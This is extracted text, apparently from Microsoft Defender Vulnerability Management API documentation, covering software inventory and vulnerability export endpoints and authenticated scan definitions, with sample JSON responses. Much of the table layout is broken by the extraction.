This API response contains all the data of installed software per device. Returns a table with an entry for every unique combination of
DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion.
2.1.1 Limitations
2.2 Permissions
ﾉ Expand table
Application Software.Read.All 'Read Threat and Vulnerability Management software information'
Delegated (work or school account) Software.Read 'Read Threat and Vulnerability Management software information'
2.3 URL
HTTP
GET /api/machines/SoftwareInventoryExport
Parameters
sasValidHours: The number of hours that the download URLs will be valid for (Maximum 24 hours)
2.5 Properties
７ Note
The files are gzip compressed & in multiline JSON format.

The download URLs are only valid for 3 hours. Otherwise you can use the parameter.
For maximum download speed of your data, you can make sure you are downloading from the same Azure region that your data
resides.
ﾉ Expand table
Export files array[string] A list of download URLs for files "[Https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...1",

holding the current snapshot of the "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...2"]
organization
GeneratedTime string The time that the export was 2021-05-20T08:00:00Z

generated.
2.6 Examples
HTTP
GET https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryExport
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesResponse",
"exportFiles": [
"https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/SoftwareInventory/json/OrgId=12345678-
195f-4223-9c7a-99fb420fd000/part-00393-e423630d-4c69-4490-8769-a4f5468c4f25.c000.json.gz?sv=2019-12-12&st=2021-01-
11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=...",
11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=..."
],
}
See also
Export non product code software inventory assessment
Other related
 Tip
Tech Community .
Feedback

Export non product code software
inventory assessment per device
Article • 09/27/2023
Applies to:

This API returns all the data for installed software that doesn't have a Common Platform
Enumeration(CPE) , on a per-device basis. The information returned by this API, along
with the information returned by the Export software inventory assessment API, for
software that does have a CPE, gives you full visibility into the software installed across
your organization and the devices it's installed on.
７ Note
Software products without a CPE are not supported by vulnerability management.

They will be shown in the software inventory page, but because CPEs are used by
vulnerability management to identify the software and any vulnerabilities,
information like, exploits, number of exposed devices, and weaknesses won't be
available for them. For more information, see Software inventory.
Different API calls get different types of data. Because the amount of data can be large,
there are two ways it can be retrieved:
Export non product code software inventory assessment JSON response The API
pulls all data in your organization as Json responses. This method is best for small
organizations with less than 100-K devices. The response is paginated, so you can
use the @odata.nextLink field from the response to fetch the next results.
Export non product code software inventory assessment via files This API solution
enables pulling larger amounts of data faster and more reliably. So, it's
recommended for large organizations, with more than 100-K devices. This API pulls
all data in your organization as download files. The response contains URLs to
download all the data from Azure Storage. This API enables you to download all
your data from Azure Storage as follows:
like.
Data that is collected (using either Json response or via files) is the current snapshot of
７ Note

assessment (JSON response)

This API response contains all the data of installed software that does not have a
Common Platform Enumeration(CPE) per device. Returns a table with an entry for
every unique combination of DeviceId, SoftwareVendor, SoftwareName,
SoftwareVersion.
Limitations
1.2 Permissions
ﾉ Expand table
Application Software.Read.All 'Read Threat and Vulnerability Management

software information'
Delegated (work or school Software.Read 'Read Threat and Vulnerability Management

account) software information'
1.3 URL
HTTP
GET /api/machines/SoftwareInventoryNoProductCodeByMachine
1.4 Parameters
doesn't pull all the data)
1.5 Properties
７ Note
Each record is approximately 0.5KB of data. You should take this into account
when choosing the correct pageSize parameter for you.
columns.
ﾉ Expand table

type
DeviceId string Unique identifier for the device in the service.

type
OSPlatform string Platform of the operating system running on the device.

These are specific operating systems with variations
Windows 11. See Supported operating systems, platforms
and capabilities for details.
RbacGroupName string The role-based access control (RBAC) group. If this device
is not assigned to any RBAC group, the value will be
"Unassigned." If the organization doesn't contain any
RBAC groups, the value will be "None."
RbacGroupId string The role-based access control (RBAC) group ID.
SoftwareLastSeenTimestamp string The last time this software was seen on the device.
SoftwareName string Name of the software product.
SoftwareVendor string Name of the software vendor.
SoftwareVersion string Version number of the software product.
1.6 Examples
HTTP
https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryNoPro
ductCodeByMachine?pageSize=3 &sinceTime=2021-05-19
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft
.windowsDefenderATP.api.AssetNonCpeSoftware)",
"value": [
{
"deviceId": "1234512345123451234512345",
"rbacGroupId": 11,
"rbacGroupName": "London",
"deviceName": "Device1",
"osPlatform": "Windows11",
"softwareName": "vs_communitymsi",
"softwareLastSeenTimestamp": "2021-01-30 11:31:12.271"
},
{
"deviceId": "232323232323232322323232323",
"rbacGroupId": 23,
"rbacGroupName": "Tokyo",
"softwareVendor": "intel",
"softwareName": "intel®_software_installer",
},
{
"deviceId": "6565656565",
"rbacGroupId": 65,
"rbacGroupName": "Center",
"softwareVendor": "Lob Apps",
"softwareName": "Headtrax",
"softwareVersion": "60.273.3",
},
],
"@odata.nextLink":
"https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryNoPr
oductCodeByMachine?pagesize=3%20%20&sincetime=2021-05-
19&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMi0wNS0zMC8xMT
AxLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIkxpbmVTdG9wcGVkQXQiOjV9"
}

assessment (via files)

This API response contains all the data of installed software that does not have a
Common Platform Enumeration(CPE) per device. Returns a table with an entry for
every unique combination of DeviceId, SoftwareVendor, SoftwareName,
SoftwareVersion.
2.1.1 Limitations
2.2 Permissions
ﾉ Expand table


2.3 URL
HTTP
GET /api/machines/SoftwareInventoryNonCpeExport
Parameters
(Maximum 24 hours)
2.5 Properties
７ Note

The download URLs are only valid for 3 hours. Otherwise you can use the
parameter.
downloading from the same Azure region that your data resides.
ﾉ Expand table
Export files array[string] A list of "

download [Https://tvmexportstrstgeus.blob.core.windows.net/tvm-
URLs for export...1",
files holding "https://tvmexportstrstgeus.blob.core.windows.net/tvm-
the current export...2"]
snapshot of
the
organization

that the
export was
generated.
2.6 Examples
HTTP
GET
https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryNonCp
eExport
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#microsoft.windowsDef
enderATP.api.ExportFilesResponse",
"exportFiles": [
"https://tvmexportexternalprdcanc.blob.core.windows.net/temp-
ffd80447-7b3d-4ad2-b366-f0979b129662/2022-05-
30/1101/NonCpeSoftwareInventory/json/OrgId=47d41a0c-188d-46d3-bbea-
a93dbc0bfcaa/_RbacGroupId=1/part-00337-5e15412b-5c85-4896-ac60-
b7b3ab8da096.c000.json.gz?sv=2020-08-04&st=2022-05-30T13%3A41%3A59Z&se=2022-
05-
30T16%3A41%3A59Z&sr=b&sp=r&sig=aHnmuOKlIvpR0PsdamYfmCCDZ1nhpuXBzK2%2FkJ9xTpg
%3D",
ffd80447-7b3d-4ad2-b366-f0979b129662/2022-05-
05-
30T16%3A41%3A59Z&sr=b&sp=r&sig=0fQg%2Ft469x26KvPLmvctLl0g6DC38CNM3lXYi9dnFfo
%3D",
ffd80447-7b3d-4ad2-b366-f0979b129662/2022-05-
05-
30T16%3A41%3A59Z&sr=b&sp=r&sig=P6HGHoLXXipMauBpLueoQVrwHL7qmvLoCjcij6ERx8o%3
D",
ffd80447-7b3d-4ad2-b366-f0979b129662/2022-05-
05-
30T16%3A41%3A59Z&sr=b&sp=r&sig=VnpVct%2F8vdiIFTf2xXP9DF7ngWv1Zqew30q2jBPVghg
%3D",
ffd80447-7b3d-4ad2-b366-f0979b129662/2022-05-
05-
30T16%3A41%3A59Z&sr=b&sp=r&sig=GY0zxMfEmr9v9fZBWYyKEtT2k%2F0ELQIlOP0ct%2B6Sd
GU%3D",
],
}
See also
Export software assessment per device
Other related

 Tip
Feedback

Article • 09/27/2023
Applies to:

Returns all known software vulnerabilities and their details for all devices, on a per-device basis.
Different API calls get different types of data. Because the amount of data can be large, there are two ways it can be retrieved:
1. Export software vulnerabilities assessment JSON response The API pulls all data in your organization as Json responses. This method
is best for small organizations with less than 100-K devices. The response is paginated, so you can use the @odata.nextLink field from
the response to fetch the next results.
2. Export software vulnerabilities assessment via files This API solution enables pulling larger amounts of data faster and more reliably.
Via-files is recommended for large organizations, with more than 100-K devices. This API pulls all data in your organization as
download files. The response contains URLs to download all the data from Azure Storage. This API enables you to download all your
data from Azure Storage as follows:
3. Delta export software vulnerabilities assessment JSON response Returns a table with an entry for every unique combination of:
DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion, CveId, and EventTimestamp. The API pulls data in your organization as
Json responses. The response is paginated, so you can use the @odata.nextLink field from the response to fetch the next results.
The full "software vulnerabilities assessment (JSON response)" is used to obtain an entire snapshot of the software vulnerabilities
assessment of your organization by device. However, the delta export API call is used to fetch only the changes that have happened
between a selected date and the current date (the "delta" API call). Instead of getting a full export with a large amount of data every
time, you'll only get specific information on new, fixed, and updated vulnerabilities. Delta export JSON response API call can also be
used to calculate different KPIs such as "how many vulnerabilities were fixed?" or "how many new vulnerabilities were added to my
organization?"
Because the Delta export JSON response API call for software vulnerabilities returns data for only a targeted date range, it isn't
considered a full export.
Data that is collected (using either Json response or via files) is the current snapshot of the current state. It doesn't contain historic data. To
collect historic data, customers must save the data in their own data storages.
７ Note
Unless indicated otherwise, all export assessment methods listed are full export and by device (also referred to as per device).
1. Export software vulnerabilities assessment (JSON response)

DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion, CVEID.
1.1.1 Limitations
1.2 Permissions
ﾉ Expand table
Application Vulnerability.Read.All 'Read Threat and Vulnerability Management vulnerability information'
Delegated (work or school account) Vulnerability.Read 'Read Threat and Vulnerability Management vulnerability information'
1.3 URL
HTTP
GET /api/machines/SoftwareVulnerabilitiesByMachine
1.4 Parameters
$top: Number of results to return (doesn't return @odata.nextLink and so doesn't pull all the data).
1.5 Properties
７ Note
Each record is approximately 1 KB of data. You should take this into account when choosing the correct pageSize parameter for
you.
ﾉ Expand table
CveId String Unique identifier CVE-2020-15992

assigned to the
security
vulnerability
under the
Common
Vulnerabilities
and Exposures
(CVE) system.
CvssScore String The CVSS score 6.2

of the CVE.
DeviceId String Unique identifier 9eaf3a8b5962e0e6b1af9ec756664a9b823df2d1

for the device in
the service.
DeviceName String Fully qualified johnlaptop.europe.contoso.com

domain name
(FQDN) of the
device.
DiskPaths Array[string] Disk evidence ["C:\Program Files (x86)\Microsoft\Silverlight\Application\silverlight.exe"]

that the product
is installed on
the device.
ExploitabilityLevel String The exploitability ExploitIsInKit

level of this
vulnerability
(NoExploit,
ExploitIsPublic,
ExploitIsVerified,
ExploitIsInKit)
FirstSeenTimestamp String First time this 2020-11-03 10:13:34.8476880

product CVE was
seen on the
device.
Id String Unique identifier 123ABG55_573AG&mnp!

for the record.
LastSeenTimestamp String Last time the 2020-11-03 10:13:34.8476880

software
vulnerability was
seen on the
device.
OSPlatform String Platform of the Windows10 and Windows 11

operating
system running
on the device.
This property
indicates specific
operating
systems with
variations within
the same family,
such as
Windows 10 and
Windows 11. See
Microsoft
Defender
Vulnerability
Management
supported
operating
systems and
platforms for
details.
RbacGroupName String The role-based Servers

access control
(RBAC) group. If
this device isn't
assigned to any
RBAC group, the
value will be
"Unassigned." If
the organization
doesn't contain
any RBAC
groups, the
value will be
"None."
RecommendationReference String A reference to va--microsoft--silverlight

the
recommendation
ID related to this
software.
RecommendedSecurityUpdate String Name or April 2020 Security Updates

(optional) description of
the security
update provided
by the software
vendor to
address the
vulnerability.
RecommendedSecurityUpdateId String Identifier of the 4550961

(optional) applicable
security updates
or identifier for
the
corresponding
guidance or
knowledge base
(KB) articles
RegistryPaths Array[string] Registry ["HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Unin

evidence that
the product is
installed in the
device.
SecurityUpdateAvailable Boolean Indicates Possible values are true or false.

whether a
security update
is available for
the software.
SoftwareName String Name of the Chrome

software
product.
SoftwareVendor String Name of the Google

software vendor.
SoftwareVersion String Version number 81.0.4044.138

of the software
product.
VulnerabilitySeverityLevel String Severity level Medium

assigned to the
security
vulnerability
based on the
CVSS score.
1.6 Examples
HTTP
GET https://api.securitycenter.microsoft.com/api/machines/SoftwareVulnerabilitiesByMachine?pageSize=5
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.AssetVulnerability)",
"value": [
{
"id": "00044f612345baf759462dbe6db733b6a9c59ab4_edge_10.0.17763.1637__",
"deviceId": "00044f612345daf756462bde6bd733b9a9c59ab4",
"deviceName":
"ComputerPII_18663b45912eed224b2de2f5ea3142726e63f16a.DomainPII_21eeb80d089e79bdfa178eabfa25e8de9acfa346.corp.contoso.com",
"osVersion": "10.0.17763.1637",
"osArchitecture": "x64",
"softwareName": "edge",
"cveId": null,
"vulnerabilitySeverityLevel": null,
"recommendedSecurityUpdate": null,
"recommendedSecurityUpdateId": null,
"recommendedSecurityUpdateUrl": null,
"diskPaths": [],
"lastSeenTimestamp": "2020-12-30 14:17:26",
"firstSeenTimestamp": "2020-12-30 11:07:15",
"exploitabilityLevel": "NoExploit",
"recommendationReference": "va-_-microsoft-_-edge",
"securityUpdateAvailable": true
},
{
"id": "00044f912345baf756462bde6db733b9a9c56ad4_.net_framework_4.0.0.0__",
"deviceId": "00044f912345daf756462bde6db733b6a9c59ad4",
"deviceName":
"ComputerPII_18663b45912eed224b2be2f5ea3142726e63f16a.DomainPII_21eeb80b086e79bdfa178eabfa25e8de6acfa346.corp.contoso.com",
"osVersion": "10.0.17763.1637",
"softwareName": ".net_framework",
"cveId": null,
"diskPaths": [],
"registryPaths": [
"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4.0\\Client\\Install"
],
"recommendationReference": "va-_-microsoft-_-.net_framework",
},
{
"id": "00044f912345baf756462dbe6db733d6a9c59ab4_system_center_2012_endpoint_protection_4.10.209.0__",
"deviceId": "00044f912345daf756462bde6db733b6a9c59ab4",
"deviceName":
"ComputerPII_18663b45912eed224b2be2f5ea3142726e63f16a.DomainPII_21eed80b089e79bdfa178eadfa25e8be6acfa346.corp.contoso.com",
"osVersion": "10.0.17763.1637",
"cveId": null,
"diskPaths": [],
"registryPaths": [
],
"recommendationReference": "va-_-microsoft-_-system_center_2012_endpoint_protection",
},
{
"id": "00044f612345bdaf759462dbe6bd733b6a9c59ab4_onedrive_20.245.1206.2__",
"deviceId": "00044f91234daf759492dbe6bd733b6a9c59ab4",
"deviceName":
"ComputerPII_189663d45612eed224b2be2f5ea3142729e63f16a.DomainPII_21eed80b086e79bdfa178eadfa25e8de6acfa346.corp.contoso.com"
,
"osVersion": "10.0.17763.1637",
"softwareName": "onedrive",
"cveId": null,
"diskPaths": [],
"registryPaths": [
"HKEY_USERS\\S-1-5-21-2944539346-1310925172-2349113062-
1001\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\OneDriveSetup.exe"
],
"recommendationReference": "va-_-microsoft-_-onedrive",
},
{
"id": "00044f912345daf759462bde6db733b6a9c56ab4_windows_10_10.0.17763.1637__",
"deviceId": "00044f912345daf756462dbe6db733d6a9c59ab4",
"deviceName":
"ComputerPII_18663b45912eeb224d2be2f5ea3142729e63f16a.DomainPII_21eeb80d086e79bdfa178eadfa25e8de6acfa346.corp.contoso.com",
"osVersion": "10.0.17763.1637",
"softwareName": "windows_10" "Windows_11",
"cveId": null,
"diskPaths": [],
"recommendationReference": "va-_-microsoft-_-windows_10" "va-_-microsoft-_-windows_11",
}
],
"@odata.nextLink": "https://api.securitycenter.microsoft.com/api/machines/SoftwareVulnerabilitiesByMachine?
pagesize=5&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMS0wMS0xMS8xMTAxLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIkxpb
mVTdG9wcGVkQXQiOjV9"
}
2. Export software vulnerabilities assessment (via files)

DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion, CVEID.
2.1.2 Limitations
2.2 Permissions
ﾉ Expand table
2.3 URL
HTTP
GET /api/machines/SoftwareVulnerabilitiesExport
2.4 Parameters
sasValidHours: The number of hours that the download URLs will be valid for (Maximum 24 hours).
2.5 Properties
７ Note
The download URLs are only valid for 3 hours; otherwise you can use the parameter.
For maximum download speed of your data, you can make sure you are downloading from the same Azure region that your data
resides.
Each record is approximately 1KB of data. You should take this into account when choosing the correct pageSize parameter for
you.
ﾉ Expand table
Export files array[string] A list of download URLs for files ["https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...1",

holding the current snapshot of the "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...2"]
organization.
GeneratedTime String The time that the export was 2021-05-20T08:00:00Z

generated.
2.6 Examples
HTTP
GET https://api-us.securitycenter.contoso.com/api/machines/SoftwareVulnerabilitiesExport
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesResponse",
"exportFiles": [
"https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/VaExport/json/OrgId=12345678-195f-
4223-9c7a-99fb420fd000/part-00393-bcc26c4f-e531-48db-9892-c93ac5d72d5c.c000.json.gz?sv=2019-12-12&st=2021-01-
11T11%3A35%3A13Z&se=2021-01-11T14%3A35%3A13Z&sr=b&sp=r&sig=..."
],
}
3. Delta export software vulnerabilities assessment (JSON response)

Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion, CveId. The API
pulls data in your organization as Json responses. The response is paginated, so you can use the @odata.nextLink field from the response
to fetch the next results. Unlike the full software vulnerabilities assessment (JSON response) (which is used to obtain an entire snapshot of
the software vulnerabilities assessment of your organization by device) the delta export JSON response API call is used to fetch only the
changes that have happened between a selected date and the current date (the "delta" API call). Instead of getting a full export with a large
amount of data every time, you'll only get specific information on new, fixed, and updated vulnerabilities. Delta export JSON response API
call can also be used to calculate different KPIs such as "how many vulnerabilities were fixed?" or "how many new vulnerabilities were
added to my organization?"
７ Note
It is highly recommended you use the full export software vulnerabilities assessment by device API call at least once a week, and this
additional export software vulnerabilities changes by device (delta) API call all the other days of the week. Unlike the other
Assessments JSON response APIs, the "delta export" is not a full export. The delta export includes only the changes that have
happened between a selected date and the current date (the "delta" API call).
3.1.1 Limitations

The sinceTime parameter has a maximum of 14 days.
3.2 Permissions
ﾉ Expand table
3.3 URL
HTTP
GET /api/machines/SoftwareVulnerabilityChangesByMachine
3.4 Parameters
sinceTime (required): The start time from which you want to see data changes. Vulnerability management generates data on new and
updated vulnerabilities every 6 hours. The data returned will include all the changes captured in the 6 hour period the specified
sinceTime falls into, along with the changes in any subsequent 6 hour periods up to and including the most recently generated data.
pageSize (default = 50,000): number of results in response.
$top: number of results to return (doesn't return @odata.nextLink and so doesn't pull all the data).
3.5 Properties
Each returned record contains all the data from the full export software vulnerabilities assessment by device API, plus two more fields:
EventTimestamp and Status.
７ Note
Some additional columns might be returned in the response. These columns are temporary and might be removed, so please use
ﾉ Expand table
Property (ID) Data type Description Example of returned value
CveId String Unique identifier assigned to CVE-2020-15992

the security vulnerability under
the Common Vulnerabilities
CvssScore String The CVSS score of the CVE. 6.2
DeviceId String Unique identifier for the device 9eaf3a8b5962e0e6b1af9ec756664a9b823df2d1

in the service.
DeviceName String Fully qualified domain name johnlaptop.europe.contoso.com

(FQDN) of the device.
DiskPaths Array[string] Disk evidence that the product ["C:\Program Files (x86)\Microsoft\Silverlight\Application\silverlight.exe"]
is installed on the device.
EventTimestamp String The time this delta event was 2021-01-11T11:06:08.291Z

found.
ExploitabilityLevel String The exploitability level of this ExploitIsInKit

vulnerability (NoExploit,
ExploitIsPublic,
ExploitIsVerified, ExploitIsInKit)
FirstSeenTimestamp String First time the CVE of this 2020-11-03 10:13:34.8476880

product was seen on the
device.
Id String Unique identifier for the 123ABG55_573AG&mnp!

record.
LastSeenTimestamp String Last time the CVE was seen on 2020-11-03 10:13:34.8476880
the device.
OSPlatform String Platform of the operating Windows10 and Windows 11

system running on the device;
specific operating systems with
variations within the same
family, such as Windows 10
and Windows 11. See Microsoft
Defender Vulnerability
Management supported
operating systems and
platforms for details.
RbacGroupName String The role-based access control Servers

(RBAC) group. If this device
isn't assigned to any RBAC
group, the value will be
"Unassigned." If the
organization doesn't contain
any RBAC groups, the value will
be "None."
RecommendationReference string A reference to the va--microsoft--silverlight

recommendation ID related to
this software.
RecommendedSecurityUpdate String Name or description of the April 2020 Security Updates

security update provided by
Property (ID) Data type Description Example of returned value
the software vendor to address

the vulnerability.
RecommendedSecurityUpdateId String Identifier of the applicable 4550961

security updates or identifier
for the corresponding
guidance or knowledge base
(KB) articles
RegistryPaths Array[string] Registry evidence that the ["HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\Curren

product is installed in the Chrome"]
device.
SoftwareName String Name of the software product. Chrome
SoftwareVendor String Name of the software vendor. Google
SoftwareVersion String Version number of the software 81.0.4044.138

product.
Status String New (for a new vulnerability Fixed

introduced on a device) (1)
Fixed (if this vulnerability
doesn't exist anymore on the
device, which means it was
remediated). (2) Updated (if a
vulnerability on a device has
changed. The possible changes
are: CVSS score, exploitability
level, severity level, DiskPaths,
RegistryPaths,
RecommendedSecurityUpdate).
VulnerabilitySeverityLevel String Severity level that is assigned Medium

to the security vulnerability. It's
based on the CVSS score.
Clarifications
If the software was updated from version 1.0 to version 2.0, and both versions are exposed to CVE-A, you'll receive two separate
events:
1. Fixed: CVE-A on version 1.0 was fixed.

2. New: CVE-A on version 2.0 was added.
If a specific vulnerability (for example, CVE-A) was first seen at a specific time (for example, January 10) on software with version 1.0,
and a few days later that software was updated to version 2.0 which also exposed to the same CVE-A, you'll receive these two
separated events:
1. Fixed: CVE-X, FirstSeenTimestamp January 10, version 1,0.

2. New: CVE-X, FirstSeenTimestamp January 10, version 2.0.
3.6 Examples
HTTP
GET https://api.securitycenter.microsoft.com/api/machines/SoftwareVulnerabilityChangesByMachine?pageSize=5&sinceTime=2021-
05-19T18%3A35%3A49.924Z
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.DeltaAssetVulnerability
)",
"value": [
{
"id": "008198251234544f7dfa715e278d4cec0c16c171_chrome_87.0.4280.88__",
"deviceId": "008198251234544f7dfa715e278b4cec0c19c171",
"deviceName":
"ComputerPII_1c8fee370690ca24b6a0d3f34d193b0424943a8b8.DomainPII_0dc1aee0fa366d175e514bd91a9e7a5b2b07ee8e.corp.contoso.com"
,
"osVersion": "10.0.19042.685",
"softwareVendor": "google",
"softwareName": "chrome",
"cveId": null,
"diskPaths": [
"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"
],
"registryPaths": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Google Chrome"
],
"recommendationReference": "va-_-google-_-chrome",
"status": "Fixed",
"eventTimestamp": "2021-01-11T11:06:08.291Z"
},
{
"id": "00e59c61234533860738ecf488eec8abf296e41e_onedrive_20.64.329.3__",
"deviceId": "00e56c91234533860738ecf488eec8abf296e41e",
"deviceName":
"ComputerPII_82c13a8ad8cf3dbaf7bf34fada9fa3aebc124116.DomainPII_21eeb80d086e79dbfa178eadfa25e8de9acfa346.corp.contoso.com",
"osVersion": "10.0.18363.1256",
"softwareName": "onedrive",
"cveId": null,
"diskPaths": [],
"registryPaths": [
"HKEY_USERS\\S-1-5-21-2127521184-1604012920-1887927527-
24918864\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\OneDriveSetup.exe"
],
"recommendationReference": "va-_-microsoft-_-onedrive",
"status": "Fixed",
},
{
"id": "01aa8c73095bb12345918663f3f94ce322107d24_firefox_83.0.0.0_CVE-2020-26971_",
"deviceId": "01aa8c73065bb12345918693f3f94ce322107d24",
"deviceName":
"ComputerPII_42684eb981bea2d670027e7ad2caafd3f2b381a3.DomainPII_21eed80b086e76dbfa178eabfa25e8de9acfa346.corp.contoso.com",
"osVersion": "10.0.19042.685",
"softwareVendor": "mozilla",
"softwareName": "firefox",
"cveId": "CVE-2020-26971",
"vulnerabilitySeverityLevel": "High",
"recommendedSecurityUpdate": "193220",
"diskPaths": [
"C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe"
],
"registryPaths": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Mozilla Firefox
83.0 (x86 en-US)"
],
"recommendationReference": "va-_-mozilla-_-firefox",
"status": "Fixed",
},
{
"id": "026f0fcb12345fbd2decd1a339702131422d362e_project_16.0.13701.20000__",
"deviceId": "029f0fcb13245fbd2decd1a336702131422d392e",
"deviceName":
"ComputerPII_a5706750acba75f15d69cd17f4a7fcd268d6422c.DomainPII_f290e982685f7e8eee168b4332e0ae5d2a069cd6.corp.contoso.com",
"osVersion": "10.0.19042.685",
"softwareName": "project",
"cveId": null,
"diskPaths": [],
"registryPaths": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\ProjectProRetail - en-us"
],
"recommendationReference": "va-_-microsoft-_-project",
"status": "Fixed",
},
{
"id": "038df381234510b357ac19d0113ef622e4e212b3_chrome_81.0.4044.138_CVE-2020-16011_",
"deviceId": "038df381234510d357ac19b0113ef922e4e212b3",
"deviceName":
"ComputerPII_365f5c0bb7202c163937dad3d017969b2d760eb4.DomainPII_29596a43a2ef2bbfa00f6a16c0cb1d108bc63e32.DomainPII_3c5fefd2
e6fda2f36257359404f6c1092aa6d4b8.net",
"osVersion": "10.0.18363.1256",
"softwareVendor": "google",
"softwareName": "chrome",
"cveId": "CVE-2020-16011",
"vulnerabilitySeverityLevel": "High",
"recommendedSecurityUpdate": "ADV 200002",
"diskPaths": [
"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"
],
"registryPaths": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{C4EBFDFD-0C55-3E5F-A919-
E3C54949024A}"
],
"recommendationReference": "va-_-google-_-chrome",
"status": "Fixed",
}
],
"@odata.nextLink": "https://wpatdadi-eus-stg.cloudapp.net/api/machines/SoftwareVulnerabilitiesTimeline?sincetime=2021-
01-
11&pagesize=5&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMS0wMS0xMS8xMTAxLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIk
xpbmVTdG9wcGVkQXQiOjV9"
}
See also
Other related

 Tip
Tech Community .
Feedback

Authenticated scan methods and
properties
Article • 02/22/2024
Applies to:

Want to experience Microsoft Defender Vulnerability Management? Learn more

about how you can sign up to the Microsoft Defender Vulnerability Management
public preview trial.
） Important

７ Note
 Tip
Methods
ﾉ Expand table
Method Description
Get all scan definitions List all scan definitions.
Add, delete, or update a scan definition Add, delete, or update a new scan definition.
Get all scan agents List all scan agents.
Get scan agent by ID Retrieves the details for a specified agent by its ID.
Get scan history by definition List scan definition history.
Get scan history by session List scan history for a session.
Learn more about Windows authenticated scan and Network authenticated scans.
Properties
ﾉ Expand table
Property Data Description

type
id String Scan ID.
scanType Enum The type of scan. Possible values are: Windows , Network .
scanName String Name of the scan.
isActive Boolean Status of whether the scan actively running.
orgId String Related organization ID.
intervalInHours Int The interval at which the scan runs.
createdBy String Unique identity of the user that created the scan.
targetType String The target type in the target field. Possible types are IP
Address or Hostname . Default value is IP Address.
target String A comma separated list of targets to scan, either IP

addresses or hostnames.
scanAuthenticationParams Object An object representing the authentication parameters,

see Authentication parameters object properties for
Property Data Description
type
expected fields. This property is mandatory when creating

a new scan and is optional when updating a scan.
scannerAgent Object An object representing the scanner agent, contains the

machine Id of the scanning device.
Authentication parameters object properties
ﾉ Expand table
Property Data type Description
@odata.type Enum The scan type authentication parameters. Possible values are:
#microsoft.windowsDefenderATP.api.SnmpAuthParams for
Network scan type, and
#microsoft.windowsDefenderATP.api.WindowsAuthParams for
Windows scan type.
type Enum The authentication method. Possible values vary based on

@odata.type property.
- If @odata.type is SnmpAuthParams , possible values are
CommunityString , NoAuthNoPriv , AuthNoPriv , AuthPriv .
- If @odata.type is WindowsAuthParams possible values are
Kerberos or Negotiate .
KeyVaultUrl String An optional property that specifies from which KeyVault the
(Optional) scanner should retrieve credentials. If KeyVault is specified
there's no need to specify username, password.
KeyVaultSecretName String An optional property that specifies KeyVault secret name

(Optional) from which the scanner should retrieve credentials. If
KeyVault is specified there's no need to specify username,
password.
Domain String Domain name when using WindowsAuthParams .

(Optional)
Username String Username when using WindowsAuthParams or the username

(Optional) when choosing SnmpAuthParams with any type other than
CommunityString .
IsGMSAUser Boolean Must be set to true when choosing WindowsAuthParams .

(Optional)
CommunityString String Community string to use when choosing SnmpAuthParams with

(Optional) CommunityString
Property Data type Description
AuthProtocol String Auth protocol to use with SnmpAuthParams and AuthNoPriv or

(Optional) AuthPriv . Possible values are MD5 , SHA1 .
AuthPassword String Auth password to use with SnmpAuthParams and AuthNoPriv

(Optional) or AuthPriv .
PrivProtocol String Priv protocol to use with SnmpAuthParams and AuthPriv .

(Optional) Possible values are DES , 3DES , AES .
PrivPassword String Priv password to use with SnmpAuthParams and AuthPriv .

(Optional)
 Tip
Feedback

Get scan definitions
Article • 11/15/2023
Applies to:

Want to experience Microsoft Defender Vulnerability Management? Find out how to

sign up for a free trial.
） Important

７ Note
 Tip
API description
Retrieves a list of all scan definitions.
Limitations
Permissions
ﾉ Expand table
Application Machine.Read.All Read all scan information.
